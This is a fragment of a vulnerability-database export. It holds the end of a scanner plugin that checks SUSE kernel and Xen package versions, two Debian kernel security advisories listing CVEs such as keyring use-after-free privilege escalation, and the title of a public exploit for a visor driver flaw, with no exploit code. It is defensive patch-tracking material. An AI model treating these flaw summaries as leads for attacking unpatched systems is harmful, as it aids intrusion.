reference:\"kernel-xen-base-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.16.7-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-kmp-default-4.4.4_02_k3.16.7_42-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-kmp-default-debuginfo-4.4.4_02_k3.16.7_42-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-kmp-desktop-4.4.4_02_k3.16.7_42-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-kmp-desktop-debuginfo-4.4.4_02_k3.16.7_42-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-tools-4.4.4_02-46.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.4.4_02-46.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bbswitch / bbswitch-debugsource / bbswitch-kmp-default / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2023-05-02T16:14:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3448-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 19, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2013-4312 CVE-2015-7566 CVE-2015-8767 CVE-2016-0723\n CVE-2016-0728\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation or denial-of-service.\n\nCVE-2013-4312\n\n Tetsuo Handa discovered that it is possible for a process to open\n far more files than the process' limit leading to denial-of-service\n conditions.\n\nCVE-2015-7566\n\n Ralf Spenneberg of OpenSource Security reported that the visor\n driver crashes when a specially crafted USB device without bulk-out\n endpoint is detected.\n\nCVE-2015-8767\n\n An SCTP denial-of-service was discovered which can be triggered by a\n local attacker during a heartbeat timeout event after the 4-way\n handshake.\n\nCVE-2016-0723\n\n A use-after-free vulnerability was discovered in the TIOCGETD ioctl.\n A local attacker could use this flaw for denial-of-service.\n\nCVE-2016-0728\n\n The Perception Point research team discovered a use-after-free\n vulnerability in the keyring facility, possibly leading to local\n privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.7-ckt20-1+deb8u3.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-19T12:40:10", "type": "debian", "title": "[SECURITY] [DSA 3448-1] linux security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-0728"], "modified": "2016-01-19T12:40:10", "id": "DEBIAN:DSA-3448-1:C7742", "href": "https://lists.debian.org/debian-security-announce/2016/msg00018.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-23T22:17:05", "description": "Package\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0: linux-2.6\nVersion\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0: 2.6.32-48squeeze19\nCVE ID\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0: CVE-2015-7566 CVE-2015-8767 CVE-2015-8785 CVE-2016-0723\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0CVE-2016-2069\n\nThis update fixes the CVEs described below.\n\nCVE-2015-7566\n\n\u00a0\u00a0\u00a0\u00a0Ralf Spenneberg of OpenSource Security reported that the visor\n\u00a0\u00a0\u00a0\u00a0driver crashes when a specially crafted USB device without bulk-out\n\u00a0\u00a0\u00a0\u00a0endpoint is detected.\n\nCVE-2015-8767\n\n\u00a0\u00a0\u00a0\u00a0An SCTP denial-of-service was discovered which can be triggered by a\n\u00a0\u00a0\u00a0\u00a0local attacker during a heartbeat timeout event after the 4-way\n\u00a0\u00a0\u00a0\u00a0handshake.\n\nCVE-2015-8785\n\n\u00a0\u00a0\u00a0\u00a0It was discovered that local users permitted to write to a file on\n\u00a0\u00a0\u00a0\u00a0a FUSE filesystem could cause a denial of service (unkillable loop\n\u00a0\u00a0\u00a0\u00a0in the kernel).\n\nCVE-2016-0723\n\n\u00a0\u00a0\u00a0\u00a0A use-after-free vulnerability was discovered in the TIOCGETD ioctl.\n\u00a0\u00a0\u00a0\u00a0A local attacker could use this flaw for denial-of-service.\n\nCVE-2016-2069\n\n\u00a0\u00a0\u00a0\u00a0Andy Lutomirski discovered a race condition in flushing of the TLB\n\u00a0\u00a0\u00a0\u00a0when switching tasks.\u00a0\u00a0On an SMP system this could possibly lead to\n\u00a0\u00a0\u00a0\u00a0a crash, information leak or privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze19.\u00a0\u00a0Additionally, this version\nincludes upstream stable update 2.6.32.70.\u00a0\u00a0This is the final update\nto the linux-2.6 package for squeeze.\n\nFor the oldstable distribution (wheezy), these problems will be fixed\nsoon.\n\nFor the stable distribution (jessie), CVE-2015-7566, CVE-2015-8767 and\nCVE-2016-0723 were fixed in linux version 3.16.7-ckt20-1+deb8u3 and\nthe remaining problems will be fixed soon.\n\n-- \nBen Hutchings - Debian developer, member of Linux kernel and LTS teams\n\n\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-06T15:28:06", "type": "debian", "title": "[SECURITY] [DLA 412-1] linux-2.6 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE
Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference
